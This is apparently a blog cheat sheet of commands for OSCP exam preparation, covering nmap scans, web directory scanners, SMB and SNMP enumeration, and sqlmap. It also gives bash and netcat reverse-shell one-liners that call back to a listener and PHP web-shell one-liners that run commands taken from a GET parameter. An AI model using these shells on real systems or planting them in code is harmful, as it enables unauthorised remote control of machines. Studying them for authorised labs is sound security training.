Useful Commands and Tools – OSCP

In previous article, we’ve shared a wide range of tools for sub-domain enumeration which helps pentesters and bug hunters collect and gather subdomains for the domain they are targeting.

Enumeration is the most important thing you can do, at that inevitable stage where you find yourself hitting a wall, 90% of the time it will be because you haven’t done enough enumeration.

There are a ton of certifications in this hacking and security domain but Offensive Security certifications are the ones that will really make you realize that you have actually earned it, rather than just crossed your fingers and did a MCQ exam.

Yes we’re talking about OSCP (Offensive Security Certified Professional). OSCP preparation, lab, and the exam is an awesome journey where you will experience lots of excitement, pain, suffering, frustration, confidence, and motivation where learning will be constant throughout the journey.

Below are the few commands which will be very helpful for OSCP preparation are as follows:

Nmap Commands

[#] Quick TCP Scan

Command: nmap -sC -sV -vv -oA quick 192.168.1.10

[#] Quick UDP Scan

Command: nmap -sU -sV -vv -oA quick_udp 192.168.1.10

[#] Full TCP Scan

Command: nmap -sC -sV -p- -vv -oA full 192.168.1.10

Web Scanning

[#] Nikto

Command: nikto -h 192.168.1.10

[#] Dirsearch

Command: python dirsearch.py -u http://192.168.1.10 -e php,txt,html,log,conf,cfg,ini,pdf -x 301,403,503,302 –random-agent

[#] Directory Buster

Command: dirb http://192.168.1.10/ /usr/share/wordlists/dirb/common.txt

[#] Whatweb

Command: whatweb -v -a 3 192.168.1.10

[#] Gobuster

Command: gobuster -e -u http://192.168.1.10/ -w /usr/share/wordlists/dirb/common.txt

[#] Wfuzz

Command: wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt –hc 404 http://192.168.1.10

[#] WPScan

Command: wpscan -u http://192.168.1.10/

[#] Joomscan

Command: joomscan -u http://192.168.1.10/

Port Checking

[#] Netcat Banner Grabbing

Command: nc -v 192.168.1.10 port

[#] Telnet Banner Grabbing

Command: telnet 192.168.1.10 port

SMB

[#] SMB Vulnerability Scan

Command: nmap -p 445 -vv –script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.1.10

[#] SMB Users & Shares Scan

Command: nmap -p 445 -vv –script=smb-enum-shares.nse,smb-enum-users.nse 192.168.1.10

[#] Enum4linux

Command: enum4linux -a 192.168.1.10

[#] Null connect

Command: rpcclient -U “” 192.168.1.10

[#] Connect to SMB share

Command: smbclient //MOUNT/share

SNMP

[#] SNMP Enumeration

Command: snmp-check 192.168.1.10 -c public

Python Servers

[#] Simple Web Server

Command: python -m SimpleHTTPServer 80

[#] FTP Server

Command: python -m pyftpdlib -p 21 -w

Reverse Shells

[#] Bash Shell

Command: bash -i >& /dev/tcp/192.168.1.10/4443 0>&1

[#] Netcat linux

Command: nc -e /bin/sh 192.168.1.10 4443

[#] Netcat windows

Command: nc -e cmd.exe 192.168.1.10 4443

PHP

[#] PHP command Injection with system from GET Request

Command: <?php echo system($_GET[“cmd”]);?>

[#] PHP Command Injection with Shell Exec from GET Request

Command: <?php echo shell_exec($_GET[“cmd”]);?>

SQL Injection

[#] SQL Injection Exploitation with Sqlmap

Command: sqlmap -u http://10.10.10.10 –dbs

You may also like:

Sarcastic Writer

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.

Related Posts